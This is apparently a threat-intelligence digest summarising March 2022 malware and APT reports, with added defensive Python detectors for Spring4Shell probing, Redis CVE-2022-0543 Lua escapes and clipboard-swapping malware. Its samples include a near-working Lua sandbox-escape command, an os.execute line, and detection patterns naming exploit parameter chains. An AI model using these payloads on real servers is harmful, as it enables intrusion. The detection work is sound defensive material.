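A check a responder can run over web access logs while the patch is being rolled out, added here as an example and not taken from the Securonix write-up: the public Spring4Shell exploit passes property-path parameters of the form class.module.classLoader.… to Spring’s data binder and uses them to rewrite Tomcat’s AccessLogValve fields, so those parameter names in a request are a strong signal. The access-log format, the sample lines and the double URL-decoding are assumptions of this example; the parameter values in the samples are abbreviated and are not a working exploit.

```python
import re
from typing import Dict, List
from urllib.parse import unquote_plus

# Property chains the exploit feeds to Spring's data binder. The JDK 9+ chain goes
# through Class.getModule(); the shorter class.classLoader form is the older
# CVE-2010-1622 chain and is still worth flagging.
CLASSLOADER_RE = re.compile(r"class\.(?:module\.)?classLoader", re.IGNORECASE)
# Tomcat AccessLogValve fields the public exploit rewrites to drop a JSP via the log.
LOGVALVE_RE = re.compile(
    r"pipeline\.first\.(?:pattern|suffix|directory|prefix|fileDateFormat)", re.IGNORECASE
)
# Common/combined access log: ip ident user [ts] "METHOD target PROTO" status bytes ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)


def classify_request(target: str) -> List[str]:
    """Return the reasons a request target looks like Spring4Shell probing.

    The target is URL-decoded twice so that %2E / %252E tricks do not hide the dots.
    """
    decoded = unquote_plus(unquote_plus(target))
    reasons = []
    if CLASSLOADER_RE.search(decoded):
        reasons.append("classLoader property chain")
    if LOGVALVE_RE.search(decoded):
        reasons.append("AccessLogValve field write")
    return reasons


def scan_access_log(lines: List[str]) -> List[Dict[str, object]]:
    """Flag log lines whose request target carries the exploit's parameter names.

    Limitation: only the query string is logged. The same parameters in a POST
    body are invisible here and need a request-body-aware source (WAF, app log).
    """
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        reasons = classify_request(m["target"])
        if reasons:
            hits.append({
                "ip": m["ip"],
                "method": m["method"],
                "path": m["target"].split("?", 1)[0],
                "status": int(m["status"]),
                "reasons": reasons,
            })
    return hits


# Constructed sample lines; the parameter values are abbreviated, not a working exploit.
SAMPLE_LOG = [
    '10.1.2.3 - - [31/Mar/2022:10:15:01 +0000] "GET /app/greet?name=alice HTTP/1.1" 200 512',
    '203.0.113.9 - - [31/Mar/2022:10:15:07 +0000] "GET /app/greet?class.module.classLoader'
    '.resources.context.parent.pipeline.first.pattern=%25%7Bc%7Di HTTP/1.1" 200 512',
    '203.0.113.9 - - [31/Mar/2022:10:15:08 +0000] "GET /app/greet?class%2Emodule%2EclassLoader'
    '%2Eresources%2Econtext%2Eparent%2Epipeline%2Efirst%2Esuffix=.jsp HTTP/1.1" 200 512',
    '198.51.100.4 - - [31/Mar/2022:10:16:00 +0000] "POST /app/greet HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_LOG):
        print(hit)
```

The POST line in the sample is the caveat in code form: a 200 to a plain POST tells you nothing, because the exploit parameters travel in the body, so pair this with a body-aware source before concluding a host was not probed.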
—
- Intel Source:
- Fortinet
- Intel Name:
- Spoofed Invoice delivering IcedID Trojan
- Date of Scan:
- 2022-04-01
- Impact:
- MEDIUM
- Summary:
- FortiGuard Labs encountered a spearphishing campaign targeting a fuel company in Kyiv, Ukraine. The email carries an attached zip file containing an invoice file that claims to be from another fuel company. The IcedID trojan is dropped via main.dll and makes use of the Windows registry.
Source:
https://www.fortinet.com/blog/threat-research/spoofed-invoice-drops-iced-id
—
- Intel Source:
- Fortinet
- Intel Name:
- Deep Panda APT group exploiting Log4shell
- Date of Scan:
- 2022-04-01
- Impact:
- MEDIUM
- Summary:
- FortiGuard Labs detected an opportunistic campaign by the Chinese nation-state APT group “Deep Panda” exploiting the Log4Shell vulnerability in VMware Horizon servers belonging to the financial, academic, cosmetics and travel industries.
Source:
https://www.fortinet.com/blog/threat-research/deep-panda-log4shell-fire-chili-rootkits
—
- Intel Source:
- Symantec
- Intel Name:
- Verblecon – A New Malware Loader
- Date of Scan:
- 2022-03-31
- Impact:
- LOW
- Summary:
- Symantec researchers have identified a malware named Trojan.Verblecon that is being leveraged in attacks whose end goal appears to be installing cryptocurrency miners on infected machines. However, the capabilities of this malware indicate that it could be highly dangerous if leveraged in ransomware or espionage campaigns.
—
- Intel Source:
- Intel Name:
- Multiple APT groups targeting Eastern Europe
- Date of Scan:
- 2022-03-31
- Impact:
- MEDIUM
- Summary:
- Google TAG researchers have tracked three APT groups targeting government and military organisations in Ukraine, Kazakhstan and Mongolia, as well as NATO forces in Eastern Europe. All three groups are conducting phishing campaigns against their targets.
Source:
https://blog.google/threat-analysis-group/tracking-cyber-activity-eastern-europe/
—
- Intel Source:
- Cisco Talos
- Intel Name:
- Transparent Tribe targets Indian government and military
- Date of Scan:
- 2022-03-31
- Impact:
- MEDIUM
- Summary:
- Cisco Talos researchers have identified a new campaign by Transparent Tribe targeting Indian government and military bodies. The threat actor is leveraging CrimsonRAT to infect victims.
Source:
https://blog.talosintelligence.com/2022/03/transparent-tribe-new-campaign.html
—
- Intel Source:
- Intel Name:
- Chromium Based Browser Vulnerability
- Date of Scan:
- 2022-03-31
- Impact:
- MEDIUM
- Summary:
- Google is urging users on Windows, macOS and Linux to update Chrome to version 99.0.4844.84 following the discovery of a vulnerability for which an exploit exists in the wild.
Source:
https://chromereleases.googleblog.com/2022/03/stable-channel-update-for-desktop_25.html
—
- Intel Source:
- ASEC
- Intel Name:
- BitRAT malware disguised as office Installer
- Date of Scan:
- 2022-03-30
- Impact:
- LOW
- Summary:
- ASEC researchers have analysed a BitRAT malware sample that is being distributed as an Office installer alongside other files. The malware is being distributed actively via file-sharing websites such as Korean webhards.
—
- Intel Source:
- ASEC
- Intel Name:
- Kimsuky distributing VB Script disguised as PDF Files
- Date of Scan:
- 2022-03-30
- Impact:
- LOW
- Summary:
- ASEC researchers have identified APT attacks by the Kimsuky group using VB Script files disguised as PDF files. When the script file with the VBS extension is run, the malware opens the innocuous PDF file embedded inside it to trick the user into thinking they opened a harmless document, and uses a malicious DLL file to exfiltrate information.
—
- Intel Source:
- Cisco
- Intel Name:
- Emotet New IoC and New Pattern
- Date of Scan:
- 2022-03-30
- Impact:
- MEDIUM
- Summary:
- Cisco conducted research to find new Emotet IOCs and URL patterns related to the new wave of Emotet activity since its re-emergence in November 2021. Cisco researchers summarize the Emotet (Geodo/Heodo) malware threat, its lifecycle and its typical detectable patterns.
—
- Intel Source:
- Trend Micro
- Intel Name:
- Purple Fox using New variant of FatalRat
- Date of Scan:
- 2022-03-29
- Impact:
- MEDIUM
- Summary:
- Trend Micro Research has been tracking a threat actor named ‘Purple Fox’ and its activities. Researchers identified Purple Fox’s new arrival vector and the early-access loaders they believe are associated with the intrusion set behind this botnet. The operators are updating their arsenal with new malware, including a variant of the remote access trojan FatalRAT that they appear to be continuously upgrading.
—
- Intel Source:
- Intezer
- Intel Name:
- New Conversation Hijacking Campaign Delivering IcedID
- Date of Scan:
- 2022-03-29
- Impact:
- MEDIUM
- Summary:
- Researchers from Intezer provide a technical analysis of a new campaign that initiates attacks with a phishing email using conversation hijacking to deliver the IcedID malware.
Source:
https://www.intezer.com/blog/research/conversation-hijacking-campaign-delivering-icedid/
—
- Intel Source:
- Juniper
- Intel Name:
- Muhstik Gang targets Redis Servers
- Date of Scan:
- 2022-03-28
- Impact:
- MEDIUM
- Summary:
- Researchers at Juniper Threat Labs have revealed an attack that targets Redis servers using a recently disclosed vulnerability, CVE-2022-0543, which exists in some Debian Redis packages. The payload used is a variant of the Muhstik bot, which can be used to launch DDoS attacks.
Source:
https://blogs.juniper.net/en-us/security/muhstik-gang-targets-redis-servers
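Added example, not code from Juniper’s post: CVE-2022-0543 is a Lua sandbox escape in the Debian-built Redis packages, which means the attack arrives as an EVAL (or SCRIPT LOAD) whose Lua source reaches for calls a sandboxed script should never have, such as package.loadlib or io.popen. The parser below reads Redis MONITOR output and flags exactly those scripts. The MONITOR line format is the real one; the sample lines are constructed, and the escape in line 2 is shortened to the shape of the call rather than a full payload.

```python
import re
from typing import Dict, List, Optional

# MONITOR line: <unix ts> [<db> <addr:port>] "cmd" "arg" ...
MONITOR_RE = re.compile(r"^(?P<ts>\d+\.\d+) \[(?P<db>\d+) (?P<client>[^\]]+)\] (?P<args>.+)$")
# Each argument is double-quoted, with embedded quotes escaped as \"
ARG_RE = re.compile(r'"((?:[^"\\]|\\.)*)"')
# Lua calls that have no business in a sandboxed Redis script: loading a native
# library, spawning a process, running a shell command.
ESCAPE_MARKERS = ("package.loadlib", "io.popen", "os.execute")


def parse_monitor_line(line: str) -> Optional[Dict[str, object]]:
    """Split one MONITOR line into its fields and an unescaped argument list."""
    m = MONITOR_RE.match(line)
    if not m:
        return None
    args = [a.encode("utf-8").decode("unicode_escape") for a in ARG_RE.findall(m["args"])]
    return {"ts": float(m["ts"]), "db": int(m["db"]), "client": m["client"], "args": args}


def script_from_args(args: List[str]) -> Optional[str]:
    """Return the Lua source a command carries, for EVAL and SCRIPT LOAD only.

    EVALSHA carries a hash, so the script body must have been seen in an earlier
    SCRIPT LOAD; keep a history if you need to resolve those too.
    """
    if not args:
        return None
    cmd = args[0].upper()
    if cmd == "EVAL" and len(args) > 1:
        return args[1]
    if cmd == "SCRIPT" and len(args) > 2 and args[1].upper() == "LOAD":
        return args[2]
    return None


def lua_escape_markers(script: str) -> List[str]:
    return [marker for marker in ESCAPE_MARKERS if marker in script]


def scan_monitor(lines: List[str]) -> List[Dict[str, object]]:
    """Alert on every script-bearing command that references a sandbox-escape call."""
    alerts = []
    for line in lines:
        rec = parse_monitor_line(line)
        if rec is None:
            continue
        script = script_from_args(rec["args"])
        if script is None:
            continue
        markers = lua_escape_markers(script)
        if markers:
            alerts.append({
                "ts": rec["ts"],
                "client": rec["client"],
                "command": rec["args"][0].upper(),
                "markers": markers,
            })
    return alerts


# Constructed MONITOR output. Line 2 mirrors the shape of the CVE-2022-0543 escape
# (loading the Lua io library through package.loadlib); line 3 is a normal script.
SAMPLE_MONITOR = [
    '1648000000.100000 [0 10.0.0.5:49152] "GET" "session:42"',
    '1648000000.200000 [0 198.51.100.7:51000] "EVAL" "local io_l = package.loadlib('
    '\\"liblua5.1.so.0\\", \\"luaopen_io\\"); local io = io_l(); '
    'return io.popen(\\"id\\", \\"r\\"):read(\\"*a\\")" "0"',
    '1648000000.300000 [0 10.0.0.5:49152] "EVAL" "return redis.call(\\"incr\\", KEYS[1])" "1" "counter"',
    '1648000000.400000 [0 198.51.100.7:51000] "SCRIPT" "LOAD" "return os.execute(\\"touch /tmp/x\\")"',
]

if __name__ == "__main__":
    for alert in scan_monitor(SAMPLE_MONITOR):
        print(alert)
```

MONITOR is expensive on a busy instance, so this is for an incident window or a honeypot rather than permanent logging; the durable fix is the patched Debian package, and a Redis that is reachable from the internet without authentication is the real root cause regardless of this CVE.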
—
- Intel Source:
- Zscaler
- Intel Name:
- Conti Ransomware new update
- Date of Scan:
- 2022-03-28
- Impact:
- MEDIUM
- Summary:
- Researchers at Zscaler ThreatLabz have been following the Conti ransomware group and, as part of their global ransomware tracking efforts, identified an updated version of Conti ransomware that includes improved file encryption, new techniques to better evade security software and a streamlined ransom payment process.
—
- Intel Source:
- Avast
- Intel Name:
- Operation Dragon Castling
- Date of Scan:
- 2022-03-25
- Impact:
- LOW
- Summary:
- Researchers from Avast found an APT campaign dubbed Operation Dragon Castling that has been targeting betting companies in Southeast Asian countries. The campaign has similarities with several old malware samples used by an unspecified Chinese-speaking APT group.
—
- Intel Source:
- Morphisec
- Intel Name:
- JSSLoader RAT delivered through XLL Files
- Date of Scan:
- 2022-03-25
- Impact:
- LOW
- Summary:
- Morphisec Labs has discovered a new variant of the JSSLoader RAT. JSSLoader is a small but very capable .NET remote access trojan (RAT) whose capabilities include data exfiltration, persistence, auto-updating, additional payload delivery and more. Attackers are now using .XLL files to deliver an obfuscated version of JSSLoader.
Source:
https://blog.morphisec.com/new-jssloader-trojan-delivered-through-xll-files
—
- Intel Source:
- SentinelOne
- Intel Name:
- Chinese APT Scarab targets Ukraine
- Date of Scan:
- 2022-03-25
- Impact:
- MEDIUM
- Summary:
- Researchers at SentinelLabs have further analysed alert #4244, released by the Ukrainian CERT on 22 March 2022, which describes malicious activity by the UAC-0026 threat group. The Sentinel team has confirmed the attribution of UAC-0026 to the Chinese APT group Scarab.
Source:
https://www.sentinelone.com/labs/chinese-threat-actor-scarab-targeting-ukraine/
—
- Intel Source:
- Fortinet
- Intel Name:
- Tax Season and Refugee war scams delivering Emotet
- Date of Scan:
- 2022-03-25
- Impact:
- MEDIUM
- Summary:
- The FortiGuard Labs research team has analysed emails related to tax season and the Ukrainian conflict. The phishing emails are attributed to the infamous ‘Emotet’ malware, affect the Windows platform and place compromised machines under the control of the threat actor, leading to theft of personally identifiable information (PII), credential theft, monetary loss and more.
Source:
https://www.fortinet.com/blog/threat-research/bad-actors-capitalize-current-events-email-scams
—
- Intel Source:
- eSentire
- Intel Name:
- Conti Ransomware Affiliate Exposed
- Date of Scan:
- 2022-03-24
- Impact:
- MEDIUM
- Summary:
- Researchers at eSentire have been tracking the movements of the Conti gang for over two years and are now publishing a new set of indicators currently in use by a Conti affiliate. The analysis also focuses on the infrastructure used by the gang.
—
- Intel Source:
- deepinstinct
- Intel Name:
- Arid Viper using Arid Gopher malware
- Date of Scan:
- 2022-03-24
- Impact:
- MEDIUM
- Summary:
- Researchers from Deep Instinct’s Threat Research team discovered a never-before-seen Micropsia malware variant dubbed Arid Gopher, attributed to Arid Viper.
Source:
https://www.deepinstinct.com/blog/arid-gopher-the-newest-micropsia-malware-variant
—
- Intel Source:
- Avast
- Intel Name:
- Meris and TrickBot joined Hands
- Date of Scan:
- 2022-03-24
- Impact:
- MEDIUM
- Summary:
- According to Avast researchers, the Meris backdoor and TrickBot have joined hands. The botnet is known to exploit a known vulnerability in the Winbox component of MikroTik routers (CVE-2018-14847), enabling the attackers to gain unauthenticated remote administrative access to any affected device.
Source:
https://decoded.avast.io/martinhron/meris-and-trickbot-standing-on-the-shoulders-of-giants/
—
- Intel Source:
- Avast
- Intel Name:
- Password stealer disguised as private Fortnite server
- Date of Scan:
- 2022-03-24
- Impact:
- LOW
- Summary:
- Researchers at Avast have identified a password stealer disguised as a private Fortnite server where users can meet for a private match and use skins for free. The malware is being heavily propagated on the communications platform Discord.
Source:
https://blog.avast.com/password-stealer-disguised-as-fortnite-server-spreading-on-discord
—
- Intel Source:
- Trustwave
- Intel Name:
- Vidar Malware hidden in Microsoft Help file
- Date of Scan:
- 2022-03-24
- Impact:
- MEDIUM
- Summary:
- Trustwave SpiderLabs researchers have detected a Vidar malware phishing campaign that abuses Microsoft HTML Help files. Vidar is Windows spyware and an information stealer available for purchase by cybercriminals. Vidar can harvest OS and user data, online service and cryptocurrency account credentials, and credit card information.
—
- Intel Source:
- Zscaler
- Intel Name:
- Midas Ransomware – A Thanos Ransomware variant
- Date of Scan:
- 2022-03-24
- Impact:
- LOW
- Summary:
- Researchers at Zscaler have analysed variants of the Thanos ransomware and identified the shift in tactics by the ransomware in 2021. Thanos ransomware was first identified in February 2020 as a RaaS on the dark web. In 2021 the Thanos source code was leaked, after which many variants have been identified by researchers. One of the latest variants is Midas.
—
- Intel Source:
- ISC.SANS
- Intel Name:
- New variants of Arkei Stealer
- Date of Scan:
- 2022-03-24
- Impact:
- LOW
- Summary:
- Researchers at the SANS InfoSec Diary blog have analysed the Vidar, Oski and Mars stealer variants of the Arkei Stealer malware. Researchers also found that legitimate DLL files used by the Vidar, Oski and Mars variants are hosted on the same C2 server.
—
- Intel Source:
- Confiant
- Intel Name:
- Crypto Phishing
- Date of Scan:
- 2022-03-24
- Impact:
- LOW
- Summary:
- Researchers at Confiant have looked at several chains that start with an ad and end with cryptocurrency theft, usually via phishing.
Source:
https://blog.confiant.com/a-whirlwind-tour-of-crypto-phishing-8628da0a9e38
—
- Intel Source:
- Intel Name:
- Operation DreamJob and AppleJeus
- Date of Scan:
- 2022-03-24
- Impact:
- MEDIUM
- Summary:
- Researchers from Google discovered two North Korean-backed threat actors exploiting a remote code execution vulnerability in Chrome, CVE-2022-0609. These groups’ activity has been publicly tracked as Operation Dream Job and Operation AppleJeus. The campaigns have been targeting U.S.-based organizations.
Source:
https://blog.google/threat-analysis-group/countering-threats-north-korea/
—
- Intel Source:
- CERT-UA
- Intel Name:
- UAC-0026 targets Ukraine by HeaderTIP malware
- Date of Scan:
- 2022-03-23
- Impact:
- MEDIUM
- Summary:
- CERT-UA identified yet another malware, dubbed HeaderTip, which is leveraged to drop additional DLL files onto the infected host and has been targeting the infrastructure of Ukrainian state bodies and organizations across the country.
—
- Intel Source:
- CERT-UA
- Intel Name:
- Phishing Campaign using QR code targets Ukraine
- Date of Scan:
- 2022-03-23
- Impact:
- MEDIUM
- Summary:
- CERT-UA discovered the distribution of emails that mimic messages from UKR.NET and contain a QR code encoding a URL created with a URL-shortener service. The activity was attributed with low confidence to APT28.
—
- Intel Source:
- WeLiveSecurity
- Intel Name:
- Mustang Panda deploying new Hodur Malware
- Date of Scan:
- 2022-03-23
- Impact:
- MEDIUM
- Summary:
- Researchers from ESET have discovered a new cyber espionage campaign in which the China-linked APT group Mustang Panda is deploying the Hodur malware. The victims are located in East and Southeast Asia.
Source:
https://www.welivesecurity.com/2022/03/23/mustang-panda-hodur-old-tricks-new-korplug-variant/
—
- Intel Source:
- CERT-UA
- Intel Name:
- Vermin (UAC-0020) targets Ukraine Govt using Spectr malware
- Date of Scan:
- 2022-03-23
- Impact:
- MEDIUM
- Summary:
- On March 17, CERT-UA found an active spear phishing campaign delivering the SPECTR malware. The campaign was initiated by Vermin, aka UAC-0020, which is associated with the Luhansk People’s Republic (LPR).
—
- Intel Source:
- ASEC
- Intel Name:
- Document-borne APT attack targeting Carbon emissions companies
- Date of Scan:
- 2022-03-23
- Impact:
- LOW
- Summary:
- The ASEC team has analysed a malicious Word document titled ‘**** Carbon Credit Institution.doc’ that a user downloaded through a web browser. The team identified the malicious document from the logs collected by their Smart Defense tool. The document comes with macro code, and it is likely that the macro runs wscript.exe.
—
- Intel Source:
- CERT-UA
- Intel Name:
- DoubleZero Destructive Malware targets Ukrainian firms
- Date of Scan:
- 2022-03-23
- Impact:
- MEDIUM
- Summary:
- On March 17, CERT-UA found a destructive malware dubbed DoubleZero targeting Ukrainian firms. The malware erases files and destroys certain registry branches on the infected machine.
—
- Intel Source:
- ASEC
- Intel Name:
- ClipBanker Malware disguised as Malware Creation Tool
- Date of Scan:
- 2022-03-23
- Impact:
- LOW
- Summary:
- The ASEC team has identified a ClipBanker malware disguised as a malware creation tool. ClipBanker monitors the clipboard of the infected system and, if the user copies a string that is a coin wallet address, replaces it with an address designated by the attacker.
—
- Intel Source:
- Cyble
- Intel Name:
- Clipper malware disguised as AvD Crypto Stealer
- Date of Scan:
- 2022-03-23
- Impact:
- LOW
- Summary:
- Researchers at Cyble have discovered a new malware dubbed ‘AvD Crypto Stealer’ that does not actually function as a crypto stealer. Instead it is a disguised variant of the well-known clipper malware, with the capability to read and edit any text copied by the victim.
Source:
https://blog.cyble.com/2022/03/22/hunters-become-the-hunted/
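The ClipBanker entry above and this Cyble entry describe the same mechanism, so one added example serves both (this is the editor’s illustration, not code from ASEC or Cyble): a clipper watches the clipboard for text shaped like a wallet address and swaps it for the attacker’s. The defensive mirror of that is to watch the clipboard yourself and alert when an address is replaced by a different address of the same family faster than a person could act. The address patterns, the 500 ms window, the wallet strings and the event stream below are all constructed for the example.

```python
import re
from typing import Dict, List, Optional, Tuple

# Deliberately loose address shapes: a clipper only needs "looks like a wallet".
ADDRESS_PATTERNS = {
    "btc": re.compile(r"^(?:[13][a-km-zA-HJ-NP-Z1-9]{25,34}|bc1[ac-hj-np-z02-9]{25,62})$"),
    "eth": re.compile(r"^0x[0-9a-fA-F]{40}$"),
}


def classify_address(text: str) -> Optional[str]:
    """Return the coin family a clipboard string looks like, or None."""
    s = text.strip()
    for family, pattern in ADDRESS_PATTERNS.items():
        if pattern.match(s):
            return family
    return None


def detect_clipper(events: List[Tuple[float, str]], window: float = 0.5) -> List[Dict[str, object]]:
    """Flag a wallet address that is replaced by a *different* address of the same
    family within `window` seconds of being copied. A person cannot copy two
    addresses that fast; a clipper reacting to the first copy can.

    `events` are (timestamp_seconds, clipboard_text) pairs in the order observed,
    as a clipboard-change hook would deliver them.
    """
    alerts = []
    for (t_prev, prev), (t_cur, cur) in zip(events, events[1:]):
        fam_prev, fam_cur = classify_address(prev), classify_address(cur)
        if fam_prev is None or fam_prev != fam_cur:
            continue
        if prev.strip() == cur.strip():
            continue  # same address re-copied: not a swap
        delay = round(t_cur - t_prev, 3)
        if delay <= window:
            alerts.append({
                "t": t_cur,
                "family": fam_cur,
                "copied": prev,
                "replaced_with": cur,
                "delay": delay,
            })
    return alerts


# Constructed addresses (valid shape, not real wallets) and a constructed event stream.
BTC_USER = "1DemoAddrFromUserNotReaBTCxyz1234"
BTC_ATTACKER = "3AttackerSwapDestNotReaBTCabc5678"
ETH_A = "0xa1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6e7f8a9b0"
ETH_B = "0x0123456789abcdef0123456789abcdef01234567"
SAMPLE_EVENTS = [
    (100.00, "meeting notes for Tuesday"),
    (105.00, BTC_USER),
    (105.04, BTC_ATTACKER),   # rewritten 40 ms after the user's copy
    (140.00, ETH_A),
    (170.00, ETH_B),          # 30 s later: plausible user action, not flagged
    (171.00, "0xnotanaddress"),
]

if __name__ == "__main__":
    for alert in detect_clipper(SAMPLE_EVENTS):
        print(alert)
```

The timing heuristic is what makes this usable: comparing only the content would flag every user who legitimately copies two addresses in a row, and a clipper that waits a few seconds before swapping would need a wider window at the cost of more such false positives.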
—
- Intel Source:
- ASEC
- Intel Name:
- BitRAT distributed via webhards
- Date of Scan:
- 2022-03-22
- Impact:
- MEDIUM
- Summary:
- The ASEC team has analysed a malware being distributed via webhards and identified it as BitRAT. The attacker disguised the malware as a Windows 10 license verification tool and, to lure netizens, named the installer ‘New Quick Install Windows License Verification’ One-click.
—
- Intel Source:
- STR
- Intel Name:
- Serpent Backdoor_Seeder_Queries_21/03/22
- Date of Scan:
- 2022-03-22
- Impact:
- MEDIUM
- Summary:
- This research is part of Securonix Threat Labs – Threat Research Team
Source:
STR Repository
—
- Intel Source:
- CERT-UA
- Intel Name:
- UAC-0035/InvisiMole targeting Ukrainain government
- Date of Scan:
- 2022-03-22
- Impact:
- LOW
- Summary:
- CERT-UA identified cyberattacks launched by the UAC-0035/InvisiMole threat group targeting Ukrainian government organisations through phishing campaigns. InvisiMole is likely a subgroup connected to the Russia-sponsored Gamaredon group.
—
- Intel Source:
- Arete
- Intel Name:
- SurTr Ransomware recent activity
- Date of Scan:
- 2022-03-22
- Impact:
- LOW
- Summary:
- Researchers from Arete investigated a security incident involving Surtr ransomware, which makes a registry key change on the infected host to pay tribute to the REvil group.
Source:
https://areteir.com/surtr-ransomware-pays-tribute-to-revil/
—
- Intel Source:
- DFIR Report
- Intel Name:
- APT35 Automates Initial Access Using ProxyShell
- Date of Scan:
- 2022-03-22
- Impact:
- MEDIUM
- Summary:
- Researchers at The DFIR Report observed an intrusion attributed to APT35 that exploited the ProxyShell vulnerabilities, followed by further post-exploitation activity including web shells, credential dumping and specialized payloads.
Source:
https://thedfirreport.com/2022/03/21/apt35-automates-initial-access-using-proxyshell/
—
- Intel Source:
- Trellix
- Intel Name:
- DarkHotel APT New Campaign
- Date of Scan:
- 2022-03-22
- Impact:
- LOW
- Summary:
- Trellix researchers discovered a first-stage malicious campaign that has targeted luxury hotels in Macao, China, over the last five months; the attack has been attributed to the South Korean APT group DarkHotel.
—
- Intel Source:
- ASEC
- Intel Name:
- Malware disguised as a Windows Help File
- Date of Scan:
- 2022-03-22
- Impact:
- LOW
- Summary:
- The ASEC team has discovered a malware disguised as a Windows Help File (*.chm) targeting Korean users. A CHM file is a compiled HTML Help file executed by the Microsoft HTML Help executable. After the CHM file is executed, it downloads additional malicious files.
—
- Intel Source:
- Proofpoint
- Intel Name:
- Serpent Backdoor Targets French government firms
- Date of Scan:
- 2022-03-22
- Impact:
- MEDIUM
- Summary:
- Proofpoint researchers identified a targeted attack leveraging the open-source package installer Chocolatey to deliver a backdoor. The backdoor was dubbed Serpent, and the targets have been French firms in construction and real estate.
—
- Intel Source:
- Mandiant
- Intel Name:
- CAKETAP Rootkit deployed by UNC2891
- Date of Scan:
- 2022-03-21
- Impact:
- MEDIUM
- Summary:
- Security researchers from Mandiant came across a new Unix rootkit called CAKETAP that was used to steal ATM banking data. The rootkit was leveraged by UNC2891.
—
- Intel Source:
- STR
- Intel Name:
- EXOTIC LILY/BazarLoader_TTP_Seeder_Queries_18/03/22
- Date of Scan:
- 2022-03-21
- Impact:
- HIGH
- Summary:
- This research is part of Securonix Threat Labs – Threat Research Team
Source:
STR Repository
—
- Intel Source:
- Trend Micro
- Intel Name:
- Cyclops Blink malware targets Asus Router
- Date of Scan:
- 2022-03-21
- Impact:
- HIGH
- Summary:
- Researchers from TrendMicro have analyzed technical capabilities of the Cyclops Blink malware variant that has been targeting ASUS routers and provides an extensive list of more than 150 current and historical Command and Control (C2) servers of the Cyclops Blink botnet.
Source:
https://www.trendmicro.com/en_us/research/22/c/cyclops-blink-sets-sights-on-asus-routers–.html
—
- Intel Source:
- Intel Name:
- Conti Gang working with IAB
- Date of Scan:
- 2022-03-21
- Impact:
- MEDIUM
- Summary:
- The Google TAG team has discovered the operations of a threat actor dubbed ‘EXOTIC LILY’, an initial access broker linked to the Conti and Diavol ransomware operations. EXOTIC LILY was first spotted exploiting a zero-day vulnerability in Microsoft MSHTML (CVE-2021-40444). After further investigation it was determined that EXOTIC LILY is an initial access broker that uses large-scale phishing campaigns to breach targeted corporate networks.
Source:
https://blog.google/threat-analysis-group/exposing-initial-access-broker-ties-conti/
—
- Intel Source:
- Cisco Talos
- Intel Name:
- BlackCat and BlackMatter ransomware connection
- Date of Scan:
- 2022-03-21
- Impact:
- MEDIUM
- Summary:
- Cisco Talos researchers analysed the relationship between BlackCat ransomware and BlackMatter ransomware. Researchers concluded with moderate confidence that the same affiliate is behind both ransomware operations, as the same C2 infrastructure was used for certain attacks.
Source:
https://blog.talosintelligence.com/2022/03/from-blackmatter-to-blackcat-analyzing.html
—
- Intel Source:
- Avast
- Intel Name:
- DirtyMoe malware
- Date of Scan:
- 2022-03-21
- Impact:
- LOW
- Summary:
- Researchers from Avast warned of the rapid growth of the DirtyMoe botnet, which grew from 10 000 infected systems in 2020 to more than 100 000 in the first half of 2021. Experts describe DirtyMoe as a complex malware designed as a modular system. The Windows botnet has been active since late 2017; it was mainly used to mine cryptocurrency but was also involved in DDoS attacks in 2018.
Source:
https://decoded.avast.io/martinchlumecky/dirtymoe-5/
—
- Intel Source:
- Blackberry
- Intel Name:
- LokiLocker RaaS Targets Windows Systems
- Date of Scan:
- 2022-03-21
- Impact:
- MEDIUM
- Summary:
- A new ransomware-as-a-service dubbed LokiLocker has been identified by BlackBerry researchers. It targets English-speaking victims on Windows. The threat was first seen in the wild in mid-August 2021. LokiLocker encrypts the victim’s files on local drives and network shares with a standard combination of AES for file encryption and RSA for key protection.
Source:
https://blogs.blackberry.com/en/2022/03/lokilocker-ransomware
—
- Intel Source:
- Palo Alto
- Intel Name:
- Cobalt Strike-an effective emulator
- Date of Scan:
- 2022-03-21
- Impact:
- LOW
- Summary:
- Cobalt Strike is a tool that emulates command and control communications and is widely used in real-world attacks but can also be used as a way to evade traditional firewall defenses. Cobalt Strike users control Beacon’s HTTP indicators through a profile and can select either the default profile or a customizable Malleable C2 profile.
Source:
https://unit42.paloaltonetworks.com/cobalt-strike-malleable-c2-profile/
—
- Intel Source:
- QI-ANXIN Threat Intelligence Center
- Intel Name:
- GhostWriter New Espionage Campaign Update
- Date of Scan:
- 2022-03-21
- Impact:
- MEDIUM
- Summary:
- CERT-UA found and analysed a malicious zip file which contains a Microsoft Compiled HTML Help file named dovidka.chm. The malicious file, which displays the logos of the Ukrainian President’s office and secret services alongside content offering advice on dealing with the bombing, was designed to spread malware for espionage purposes against targets located in Ukraine.
—
- Intel Source:
- Dragos
- Intel Name:
- CONTI & EMOTET Infrastructure
- Date of Scan:
- 2022-03-21
- Impact:
- LOW
- Summary:
- Researchers at Dragos have observed consistent network communication between the Emotet ransomware group, which is suspected to be controlled by the Conti ransomware group, and automotive manufacturers across North America and Japan.
—
- Intel Source:
- ISC.SANS
- Intel Name:
- Qakbot infection with Cobalt Strike and VNC
- Date of Scan:
- 2022-03-18
- Impact:
- MEDIUM
- Summary:
- Researchers at SANS have dissected
Source:
https://isc.sans.edu/forums/diary/Qakbot+infection+with+Cobalt+Strike+and+VNC+activity/28448/
—
- Intel Source:
- Prevailion
- Intel Name:
- WIZARD SPIDER massive phishing campaign
- Date of Scan:
- 2022-03-17
- Impact:
- MEDIUM
- Summary:
- Researchers at Prevailion earlier this year identified a massive phishing campaign focused on collecting the credentials of Naver users. Naver is a popular South Korean online platform comparable to Google that offers a variety of services (e.g. email, news and search, among many others). Researchers found overlaps with infrastructure historically linked to WIZARD SPIDER, a Russia-based threat actor focused on initial access and ransomware operations.
Source:
https://www.prevailion.com/what-wicked-webs-we-unweave/
—
- Intel Source:
- ASEC
- Intel Name:
- Gh0stCringe RAT targets MS-SQL and MySQL servers
- Date of Scan:
- 2022-03-17
- Impact:
- MEDIUM
- Summary:
- The ASEC team has analysed and monitored a malware which is being distributed to vulnerable MySQL and MS-SQL servers. The ASEC team named the malware Gh0stCringe, also known as CirenegRAT.
—
- Intel Source:
- netlab360
- Intel Name:
- B1txor20 Botnet exploits Log4j vulnerability
- Date of Scan:
- 2022-03-16
- Impact:
- MEDIUM
- Summary:
